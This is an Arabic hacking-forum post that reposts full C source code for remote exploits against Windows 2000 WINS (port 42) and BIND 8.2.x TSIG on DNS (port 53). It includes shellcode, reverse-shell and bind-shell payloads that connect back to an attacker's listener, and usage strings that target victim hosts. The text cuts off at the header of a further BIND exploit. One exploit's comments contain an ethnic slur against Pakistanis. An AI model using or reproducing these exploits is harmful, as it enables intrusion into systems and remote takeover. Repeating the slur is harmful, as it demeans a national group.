اخلاقي تاج راسي
08-25-2013, 03:41 PM
بسم الله الرحمن الرحيم
السلام عليكم و رحمة الله و بركاتة
إن شاء الله تكونو في افضل حال
أقدم لكم في الموضوع اربع بورتات وثغراتها
وهاهي الان بين يديكم بورت 42 و بروت 53 وبروت 69 و بورت 70
نقول بسم الله الرحمن الرحيم
نبداء بـ بورت 42
42 MS Windows 2000 WINS Remote Code Execution Exploit
/************************************************** ***********/
/* ZUCWins 0.1 - Wins 2000 remote root exploit */
/* Exploit by: zuc <[email protected]> */
/* works on Windows 2000 SP3/SP4 probably every language */
/************************************************** ***********/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>
#include <netinet/in.h>
#include <curses.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x 6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x 53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\x ff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x 8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x 5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x 51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x 8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x 09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x 5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x 01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\x fe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\x c7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x 45\x04\x35"
"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x 35\x93\x93"
"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x 53\x56\x46"
"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x 55\x57\xff"
"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x 55\xec\x8d"
"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x 63\x6d\x64"
"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\x fe\xca\x01"
"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x 08\x53\x53"
"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x 6a\xff\xff"
"\x55\xe4";
char mess[] =
"\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x 01\x02\x03\x04"
// "\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x 01\x02\x03\x04"
"\x6c\xf4\x3d\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x 00\x02\x4e\x05\x00\x02\
x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4 e\x05\x00\x02\x4e\x05";
char rep[] =
"\x90\x01\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x 90\x00\x4e\x05\x90\x00\
x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x03\x4 e\x05\x90\x00\x4e\x05";
void usage();
int main(int argc, char *argv[])
{
int i,sock,sock2,sock3,addr,len=16;
int rc;
unsigned long XORIP = 0x93939393;
unsigned short XORPORT = 0x9393;
int cbport;
long cbip;
struct sockaddr_in mytcp;
struct hostent * hp;
if(argc<4 || argc>4)
usage();
cbport = htons(atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);
char mess2[200000];
memset(mess2,0,sizeof(mess2));
char mess3[210000];
memset(mess3,0,sizeof(mess3));
int ir;
for(ir =0;ir<200000;ir++)mess2[ir]='\x90';
memcpy(mess3,mess,sizeof(mess)-1);
int r=0;int le=sizeof(mess)-1;
for(r;r<30;r++)
{
memcpy(mess3+le,rep,sizeof(rep)-1);
le+=sizeof(rep)-1;
}
memcpy(mess3+le,mess2,200000);
memcpy(mess3+le+198000,shellcode,sizeof(shellcode) );
int lenr=le+200000+sizeof(shellcode);
hp = gethostbyname(argv[1]);
addr = inet_addr(argv[1]);
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
//printf("socket() error...\n");
exit(-1);
}
mytcp.sin_addr.s_addr = addr;
mytcp.sin_family = AF_INET;
mytcp.sin_port=htons(42);
printf(" connecting the target\n");
rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct
sockaddr_in));
printf(" sending exploit\n");
send(sock,mess3,lenr,0);
printf(" exploit sent\n");
sleep(5);
shutdown(sock,1);
close(sock);
shutdown(sock,2);
close(sock2);
shutdown(sock,3);
close(sock3);
exit(0);
}
void usage()
{
unsigned int a;
printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");
printf("Sample: ZUC-WINShit www.vulnwins.com 31.33.7.23 31337\n\n");
exit(0);
}
// [2004-12-31]
42 MS Windows (WINS) Remote Buffer Overflow Exploit (v.3)
/*
Windows Internet Name Service (WINS)
Remote Heap Buffer Overflow
------------------------------------
------------------------------------
Advisory credits:
----------------
Nicolas Waisman of Immunity Inc. (www.immunitysec.com)
Advisory link:
----------------
immunitysec.com/downloads/instantanea.pdf
Fix:
----------------
support.microsoft.com/kb/870763 (MS04-045)
Exploit method:
----------------
PEB (RtlEnterCriticalSection)
Tested Working:
----------------
Win2k SP4 Server ENGLISH (should be all langages, not sure)
Win2k SP4 Advanced Server ENGLISH (should be all langages, not sure)
(KB870763 removed!)
Note:
----------------
A HAT-SQUAD view on this hole; exploitable and remaining critic for Windows 2000.
May need update for Windows 2003 due to the different
structure of wins.exe in it but the bug remain exploitable
with no KB870763 of course....
If you look closely at my code , you will notice two overwrites,
this is the difference between Server <=> Advanced Server, with an
el8 pad, repair, you catch them both.
Greetings:
----------------
All guys at hat-squad and metasploit
also #n3ws at EFnet, useful to keep an eye on security.. (50 rsslinks)
and thanx you leku.
Update:
----------------
v0.2: runtime error fixed
v0.3: hardcoded repair, much decent and stable
v0.3: FreeBSD compilation fixed: gcc 101_WINS.cpp -o 101_WINS
-=[®class101.org]=-
*/
#include <stdio.h>
#include <string.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
char scode1[]=
"\x33\xC9\x83\xE9"
"\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x 53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\x C3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x 30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x 50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\x F0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x 7B\x7A\x58\x2A"
"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\x D3\x90\x9D\x64"
"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\x D3\x69\xA0\x58"
"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\x E4\x97\x36\x0C"
"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x 4E\xB3\x84\x95"
"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\x DD\x76\xD3\x0F"
"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x 6D\x74\xC3\x3B"
"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\x EE\xE1\x03\x02"
"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x 6B\x8D\xBB\x8D"
"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\x DD\x76\xB0\x07"
"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x 59\x2F\x13\x99"
"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x 10\xB5\xBB\x18"
"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\x EA\x4F\xB9\x6B"
"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x 44\xC8\xB9\x95"
"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\x E9\xE1\x03\x02"
"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";
char scode2[]=
/*original vlad902's reverse shellcode from metasploit.com
NOT xored, modded by class101 for ca's xpl0it to remove the common badchar "\x20"
original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
"\xFC\x6A\xEB\x52" /*modded adjusting jump*/
"\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x 3C\x8B\x7C\x05"
"\x78\x01\xEF"
"\x83\xC7\x01" /*modded, adding 1 to edi*/
"\x8B\x4F\x17" /*modded, adjusting ecx*/
"\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
"\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x 99\xAC\x84\xC0"
"\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x 28\x75\xE3"
"\x8B\x5F\x23" /*modded, adjusting ebx*/
"\x01\xEB\x66\x8B\x0C\x4B"
"\x8B\x5F\x1B" /*modded, adjusting ebx*/
"\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\x C0\x64\x8B\x40"
"\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x 68\x8E\x4E\x0E"
"\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x 68\x77\x73\x32"
"\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x 5F\x89\xE5\x66"
"\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\x F5\xAD\x57\xFF"
"\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x 00\x00\x00\x00"
"\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\x AA\x60\x57\xFF"
"\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x 63\x6D\x6A\x50"
"\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\x AA\x95\x89\xFD"
"\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x 68\x72\xFE\xB3"
"\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x 6A\x01\x51\x51"
"\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x 6A\xFF\xFF\x37"
"\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\x FF\x77\xFC\xFF"
"\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";
char bug[]=
"\x00\x00\x07\xD0\x00\x00\xFF\x00\x05\x39\x1F\xBC\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90";
char payload[256],payload2[4096];
int tot;
char pad[]="\x00\x00\x00\x00",padB[]="\xEB\x07";
char ret1[]="\xFC\x20\x39\x05";
char ret1b[]="\x20\xF0\xFD\x7F";
char repair[]="\xC7\x05\x20\xF0\xFD\x7F\x60\x20\xF8\x77";
char sip[3],spo[1];
#ifdef WIN32
WSADATA wsadata;
#endif
void ver();
void usage(char* us);
void sl(int time);
int main(int argc,char *argv[])
{
ver();
int check1, check2;
unsigned long gip;
unsigned short gport;
char *what, *where, *os;
if (argc>6||argc<3||atoi(argv[1])>1||atoi(argv[1])<1){usage(argv[0]);return -1;}
if (argc==5||strlen(argv[2])<7){usage(argv[0]);return -1;}
if (argc==6){if (strlen(argv[4])<7){usage(argv[0]);return -1;}}
#ifndef WIN32
if (argc==6)
{
gip=inet_addr(argv[4])^(long)0x00000000;
gport=htons(atoi(argv[5]))^(short)0x0000;
memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
check1=strlen(&sip[0]);check2=strlen(&spo[0]);
if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
printf("[+] error, the IP has a null byte in hex...\n");return -1;}
if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
if (argc==6)
{
gip=inet_addr(argv[4])^(ULONG)0x00000000;
gport=htons(atoi(argv[5]))^(USHORT)0x0000;
memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
check1=strlen(&sip[0]);check2=strlen(&spo[0]);
if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
printf("[+] error, the IP has a null byte in hex...\n");return -1;}
if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
}
#endif
int ip=htonl(inet_addr(argv[2])), port;
if (argc==4||argc==6){port=atoi(argv[3]);} else port=42;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){printf("[+] socket() error\n");return -1;}
if (atoi(argv[1]) == 1){what=ret1;where=ret1b;os="Win2k SP4 Server ENGLISH\n[+] Win2k SP4 Advanced Server ENGLISH\n";}
printf("[+] TARGET: %s\n",os);sl(1);
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
case 0: {printf("[+] connection failed\n");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
printf("[+] connected\n");sl(1);
printf("[+] building the payload..\n");sl(1);
memset(payload,0x90,196);memcpy(payload+132,what,4 );memcpy(payload+136,where,4);
memcpy(&bug[84], what, 4);memcpy(&bug[88], where, 4);
memset(payload2,0x90,2100);
memcpy(payload2+252,padB,2);memcpy(payload2+52,pad B,2);
memcpy(payload2+263,repair,10);memcpy(payload2+63, repair,10);
if (argc==6)
{
memcpy(&scode2[167], &gip, 4);
memcpy(&scode2[173], &gport, 2);
memcpy(payload2+350,scode2,strlen(scode2));
}
else memcpy(payload2+350,scode1,strlen(scode1));
printf("[+] sh0uting the heap!\n");sl(1);
if (send(s,bug,sizeof(bug)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,pad,sizeof(pad)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,pad,sizeof(pad)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,payload2,strlen(payload2),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
sl(3);
tot=sizeof(bug)-1+(sizeof(pad)*2)-2+strlen(payload)+strlen(payload2);
printf("[+]\n[+] payload size: %d\n",tot);sl(1);
if (argc==6){printf("[+] payload sent, look at your listener, you should get a shell\n");}
else printf("[+] payload sent, use telnet %s:101 to get a shell\n",inet_ntoa(server.sin_addr));
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}
void usage(char* us)
{
printf(" \n");
printf(" [+] . 101_WINS.exe Target VulnIP (bind mode) \n");
printf(" [+] . 101_WINS.exe Target VulnIP VulnPORT (bind mode) \n");
printf(" [+] . 101_WINS.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode) \n");
printf("TARGETS: \n");
printf(" [+] 1. Win2k SP4 Server English (*) - v5.0.2195 \n");
printf(" [+] 1. Win2k SP4 Advanced Server English (*) - v5.0.2195 \n");
printf("NOTE: \n");
printf(" The exploit bind a cmdshell port 101 or \n");
printf(" reverse a cmdshell on your listener. \n");
printf(" A wildcard (*) mean tested working, else, supposed working. \n");
printf(" A symbol (-) mean all. \n");
printf(" Compilation msvc6, cygwin, Linux. \n");
printf(" \n");
return;
}
void ver()
{
printf(" \n");
printf(" ================================================== =[v0.3]====\n");
printf(" ============Windows Internet Name Service (WINS)=============\n");
printf(" ============Remote Heap Buffer Overflow Exploit==============\n");
printf(" ======coded by class101=============[Hat-Squad.com 2005]=====\n");
printf(" ================================================== ===========\n");
printf(" \n");
}
void sl(int time)
{
#ifdef WIN32
Sleep(time*1000);
#else
Sleep(time);
#endif
}
// [2005-04-12]
##########################################
انتهينا من بورت 42
##########################################
نبداْ بـ بورت 53
53 BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit
/*
* tsig0wn.c
* Copyright Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau
* [email protected]
* The author is not and will not be held responsible for the action of
* other people using this code.
* provided for informational purposes only
* since a greetz section is de rigeur
* greets to my luv scharnie, sheib, darkx, famzah, brainstorm, ghQst, robbot, ......
* a special **** to all pakis including those idiots from GForce, etc....
* but then pakistan is one big village comprising exclusively of prize idiots
* tabstop set at 3
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#include <netdb.h>
#include <errno.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
/*
* This shellcode sux. cant ever get around to coding another one.
*/
char shellcode[] = {
0xeb,0x3b,0x5e,0x31,0xc0,0x31,0xdb,0xb0,0xa0,0x89,
0x34,0x06,0x8d,0x4e,0x07,0x88,0x19,0x41,0xb0,0xa4,
0x89,0x0c,0x06,0x8d,0x4e,0x0a,0x88,0x19,0x41,0xb0,
0xa8,0x89,0x0c,0x06,0x31,0xd2,0xb0,0xac,0x89,0x14,
0x06,0x89,0xf3,0x89,0xf1,0xb0,0xa0,0x01,0xc1,0xb0,
0x0b,0xcd,0x80,0x31,0xc0,0xb0,0x01,0x31,0xdb,0xcd,
0x80,0xe8,0xc0,0xff,0xff,0xff,0x2f,0x62,0x69,0x6e,
0x2f,0x73,0x68,0xff,0x2d,0x63,0xff,
0x2f,0x62,0x69,0x6e,0x2f,0x65,0x63,0x68,0x6f,0x20, 0x27,0x69,
0x6e,0x67,0x72,0x65,0x73,0x6c,0x6f,0x63,0x6b,0x20, 0x73,0x74,
0x72,0x65,0x61,0x6d,0x20,0x74,0x63,0x70,0x20,0x6e, 0x6f,0x77,
0x61,0x69,0x74,0x20,0x72,0x6f,0x6f,0x74,0x20,0x2f, 0x62,0x69,
0x6e,0x2f,0x62,0x61,0x73,0x68,0x20,0x62,0x61,0x73, 0x68,0x20,
0x20,0x2d,0x69,0x27,0x3e,0x2f,0x74,0x6d,0x70,0x2f, 0x2e,0x69,
0x6e,0x65,0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x3b, 0x20,0x2f,
0x75,0x73,0x72,0x2f,0x73,0x62,0x69,0x6e,0x2f,0x69, 0x6e,0x65,
0x74,0x64,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69, 0x6e,0x65,
0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x00,
};
#define NS_T_TSIG 250
#define SHELLCODE_OFFSET 13
#define DUMMY_ARG_OFFSET 176
#define ENUM_FILE 1 //eventlib_p.h line 141
struct {
char *system_name;
unsigned int buffer_start; /* the address where out buffer starts in memory */
unsigned int frame_pointer; /* content of the frame pointer */
int garbage_len; /* length of the garbage in which we will embed ebp|eip */
} system[] = {
{ "Test value 1", 0xbffff640, 0xbffff868, 326, },
{ "Test value 2", 0xbffff5f0, 0xbffff700, 326, },
{ "Slackware 7.0", 0xbffff590, 0xbffff7e8, 326, },
{ NULL, 0x0, 0x0, },
};
void usage (void);
void encode_dns_name (char *, int, int);
int
main (int argc, char *argv[])
{
char query[PACKETSZ]; // construct our query packet here
char *query_ptr; // pointer to walk the query buffer
HEADER *hdr_ptr; // pointer to the header part of the query buffer
int arg;
unsigned int buffer_start,
frame_pointer, // value the frame pointer will have
shellcode_addr; // address our shellcode will have in the named buffer calculated from buffer_start
int index;
char *target_name;
struct hostent *target_host;
struct sockaddr_in target;
int sockfd;
if (argc < 2)
usage ();
while ((arg = getopt (argc, argv, "b:f:s:")) != -1) {
switch (arg){
case 'b': sscanf (optarg, "%x", &buffer_start);
break;
case 'f': sscanf (optarg, "%x", &frame_pointer);
break;
case 's': index = atoi (optarg) - 1;
buffer_start = system[index].buffer_start;
frame_pointer = system[index].frame_pointer;
break;
default : usage ();
}
}
if (!(target_name = argv[optind])){
fprintf (stderr, "tsig0wn: abysmal m0r0n error\n");
exit (1);
}
/*
* Form a header.
*/
memset (query, 0, PACKETSZ);
// cud blow up on other architectures not as liberal as x86. an union like in the bind sources is the correct way to go.
hdr_ptr = (HEADER *)query;
hdr_ptr->id = htons (0x1234);
hdr_ptr->qr = 0;
hdr_ptr->opcode = 0;
hdr_ptr->qdcount = htons (2);
hdr_ptr->arcount = htons (1);
/*
* Form a query after the header where we put in the shellcode
*/
query_ptr = (char *) (hdr_ptr + 1);
memcpy (query_ptr, shellcode, strlen (shellcode)+1);
query_ptr += strlen (shellcode) + 1;
PUTSHORT (T_A, query_ptr);
PUTSHORT (C_IN, query_ptr);
/*
* we form another header here that contains garbage with embedded stuff
* i cud have put this in the same header as the shellcode and have the
* shellcode nullify. (shrug)
*/
{
char *tmp;
unsigned long dummy_argument = buffer_start+DUMMY_ARG_OFFSET;
frame_pointer &= 0xffffff00; // zero out the LSB like the overflow in ns_sign will do
// this will make layout a domain name for the second query, within which
// we will embed our ebp | eip
encode_dns_name (query_ptr, system[index].garbage_len, (frame_pointer - buffer_start) - (query_ptr - query));
query_ptr += system[index].garbage_len;
shellcode_addr = buffer_start + SHELLCODE_OFFSET;
printf ("buffer starts at address = 0x%x\n", buffer_start);
printf ("saved frame pointer after overwrite = 0x%x\n", frame_pointer);
printf ("shellcode will reside at address = 0x%x\n", shellcode_addr);
printf ("dummy argument will reside at address = 0x%x\n", dummy_argument);
// put in the type member of evEvent_p. File is what we need
tmp = query + DUMMY_ARG_OFFSET;
tmp[0] = ENUM_FILE;
tmp[1] = ENUM_FILE >> 8;
tmp[2] = ENUM_FILE >> 16;
tmp[3] = ENUM_FILE >> 24;
// embed the addresses. These will be interpreted as ebp and eip.
// we put the address where our shellcode will be situated twice.
// we overflow the saved frame pointer of datagram_read(). when the
// function returns to __evDispatch() it calls __evDrop().
// because we have shifted the frame pointer and thus __evDispatch()
// notion of the stack we also provide two pointers as arguments to
// __evDispatch. These pointers point to the start of this query header
// name, within which __evDrop will look for evEvent_p->type. we set
// type to be of type 'file' above which causes it to break and execute
// FREE() which in turn calls free().
tmp = query + (frame_pointer - buffer_start); // advance the ptr to the place where we put in our ebp|eip
tmp[0] = shellcode_addr;
tmp[1] = shellcode_addr >> 8;
tmp[2] = shellcode_addr >> 16;
tmp[3] = shellcode_addr >> 24;
tmp[4] = shellcode_addr;
tmp[5] = shellcode_addr >> 8;
tmp[6] = shellcode_addr >> 16;
tmp[7] = shellcode_addr >> 24;
tmp[8] = dummy_argument;
tmp[9] = dummy_argument >> 8;
tmp[10] = dummy_argument >> 16;
tmp[11] = dummy_argument >> 24;
tmp[12] = dummy_argument;
tmp[13] = dummy_argument >> 8;
tmp[14] = dummy_argument >> 16;
tmp[15] = dummy_argument >> 24;
}
PUTSHORT (T_A, query_ptr);
PUTSHORT (C_IN, query_ptr);
/*
* Additional section containing T_SIG stuff
*/
// a name with only one char
memcpy (query_ptr, "\x01m\x00", 3);
query_ptr+=3;
PUTSHORT (NS_T_TSIG, query_ptr);
PUTSHORT (C_IN, query_ptr);
// these members wont be checked at all as find_key returns NULL on testing secretkey_info.
// PUTLONG (0, query_ptr);
// PUTSHORT (0, query_ptr);
/*
* Connect and deliver the payload
*/
if (!(target_host = gethostbyname (target_name))){
fprintf (stderr, "host name resolution error for %s: %s\n", target_name, hstrerror (h_errno));
exit (1);
}
if ((sockfd = socket (PF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0){
perror ("socket");
exit (1);
}
memset (&target, 0, sizeof (target));
target.sin_family = AF_INET;
target.sin_port = htons (53);
target.sin_addr.s_addr = ((struct in_addr *)target_host->h_addr_list[0])->s_addr;
if (connect (sockfd, &target, sizeof (target)) < 0){
perror ("connect");
exit (1);
}
if (send (sockfd, query, query_ptr - query, 0) < 0){
perror ("send");
exit (1);
}
exit (0);
}
void
usage (void)
{
int i;
fprintf (stderr, " tsig0wn\n");
fprintf (stderr, "Copyright Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau\n");
fprintf (stderr, "\nAvailable System Types\n");
for (i = 0; system[i].system_name; i++)
fprintf (stderr, "%d. %s\n", i+1, system[i].system_name);
fprintf (stderr, "\nUsage:\n");
fprintf (stderr, "tsig0wn [ -s system type ] target\nor\n");
fprintf (stderr, "tsig0wn [ -b buffer start address ] [ -f frame pointer content ] target\n");
exit (1);
}
/*
* a pretty convoluted function.
* len is the number of octects to fill in (including the length octect)
* embed_pos is the position where we need to embed this |len|ebp|eip|.
* Hopefully when we overwrite the saved ebp on the stack
* we expect it to point here and take the eip (which in turn points to our
* shellcode) from here. The challenge here is to lay out the octets so
* that it doesnt clash with embed_pos.
*/
void
encode_dns_name (char *buf, int len, int embed_pos)
{
int ctr = 0;
int adjusted = 0;
embed_pos -= 2; // our ebp | eip needs the length octet before it, so adjust for it now + 1
len--; // for the NULL octet at the end.
// sanity check
if (embed_pos >= len){
fprintf (stderr, "encode_dns_name: embed_pos >= len\n");
exit (1);
}
while (ctr < len)
// max 63 octets allowed + preceding 1 octet for length
if (ctr+64 <= len){ // enough space for another 63+1
if (ctr+64 <= embed_pos || adjusted){ // embed_pos not in between
*buf++ = 63;
memset (buf, 'g', 63); buf += 63;
ctr+=64;
}
else { // need to adjust cuz embed_pos in between
*buf++ = embed_pos-ctr-1;
memset (buf, 'o', embed_pos-ctr-1); buf += embed_pos-ctr-1;
ctr+= embed_pos-ctr;
adjusted++;
}
}
else {
if (len - ctr <= embed_pos || adjusted){ // only remaining len - ctr
*buf++ = len-ctr-1;
memset (buf, 'g', len-ctr-1);
ctr += 63; // we are quitting anyway after this. no need to update ctrs
}
else{
*buf++ = embed_pos-len-ctr-1;
memset (buf, 'o', embed_pos-len-ctr-1); buf += embed_pos-len-ctr-1;
ctr += embed_pos-len-ctr;
adjusted++;
}
}
*buf=0x00; // finish with a 0
}
// [2001-03-01]
53 BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (2)
/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland *://lsd-pl.net/ #*/
/*## bind 8.2 8.2.1 8.2.2 8.2.2-PX Slackware 4.0/RedHat 6.2 #*/
/* The code establishes a TCP connection with port 53 of a target system. */
/* It makes use of the "infoleak" bug (through UDP) to obtain the base */
/* value of the named process frame stack pointer, which is later used */
/* for constructing proper DNS tsig exploit packet. */
/* */
/* Upon successful exploitation the assembly routine gets executed. It */
/* walks the descriptor table of the exploited named process in a search */
/* for the socket descriptor of the previously established TCP connection. */
